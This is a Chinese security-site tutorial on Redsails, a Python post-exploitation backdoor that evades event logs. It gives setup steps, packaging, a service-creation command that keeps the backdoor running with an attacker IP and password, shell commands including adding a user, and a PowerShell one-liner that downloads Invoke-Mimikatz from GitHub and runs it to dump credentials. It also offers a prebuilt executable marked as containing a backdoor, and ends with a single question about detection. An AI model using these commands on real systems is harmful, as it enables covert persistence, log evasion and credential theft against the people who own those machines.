freeBuf
主站

分类

漏洞 工具 极客 Web安全 系统安全 网络安全 无线安全 设备/客户端安全 数据安全 安全管理 企业安全 工控安全

特色

头条 人物志 活动 视频 观点 招聘 报告 资讯 区块链安全 标准与合规 容器安全 公开课
FreeBuf+小程序

FreeBuf+小程序

官方公众号企业安全新浪微博

国内领先的互联网安全新媒体,同时也是爱好者们交流与分享安全技术的社区

无痕后门——redsails使用小结
2017-11-16 18:25:16

本文作者:i春秋签约作家——Sp4ce

> Redsails是使用python开发的一款后渗透测试工具,其目的是可以使我们在目标主机上执行命令且无需创建任何事件日志以及网络连接,详细作用如下:
> - 在目标主机持续建立连接
> - 绕过许多常见的事件日志
> - 产生虚假日志/网络流量


0x01安装依赖

redsails需要pydivert、pydivert、pycrypto,因此需要pip下【此步在windows下完成】

> pip install pydivert

1.png

 pip install pbkdf2

2.png

> easy_install pycrypto

在安装pycrpto之前需要VC++编译器点我下载

3.png

在没有python环境的windows下执行需要将其打包,因此还需要pyinstaller

> pip install pyinstaller

4.png

0x02环境介绍&配置&攻击

攻击机:Windows7、Kali Linux
windows7IP:10.53.3.102
Klilinux IP:10.53.3.104
靶机:Windows 2008 R2 DataCenter、Windows 2012R2【可在windows全平台运行】
IP:10.53.3.161、10.53.3.211
首先从gayhub上下载redsails并解压到桌面


5.png

pyinstaller-script.py -F --clean redSails.spec

6.png


7.png

8.png


9.png


> 长久控制【添加到服务】
> 【命令注释】
> ATTACKIP:攻击机IP,PORT:开放端口,PASSWORD:连接密码
> 肉鸡CMD下执行
> sc.exe create servername binpath= "cmd.exe /C FILEPATH/FILENAME -a ATTACKIP -o PORT -p PASSWORD"
> 黑体部分按照上面说的自己替换


更多的东西自己挖掘吧

SHELL下的常用CMD命令
其实就是CMD命令前面加SHELL::
SHELL::whoami
SHELL::net user
SHELL::netstat -ano
SHELL::net user name password /add

powershell在这里也可以用
命令:PSHELL::POWERSHELL命令
查密码的命令:PSHELL::IEX(New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Mimikatz.ps1 ');Invoke-Mimikatz

如果有无法生成的,可以用附件中的exe
文件信息
MD5: 3F985A55BEAAF1E11C87CDE1A34E49D6
SHA1: EE6A0458D9CCEE529CD75D89245B18057E20B291
CRC32: 99D4B13E
[hide]有后门[/hide]

0x03思考

> 如果后门可以躲避IDS等流量监控系统的审查,那么作为运维的我们该如何检测呢?


更多查看原文哦~

本文作者:, 转载请注明来自FreeBuf.COM

# Redsails
被以下专栏收录,发现更多精彩内容
+ 收入我的专栏
评论 按时间排序

登录/注册后在FreeBuf发布内容哦

相关推荐
  • 0 文章数
  • 0 评论数
  • 0 关注者
登录 / 注册后在FreeBuf发布内容哦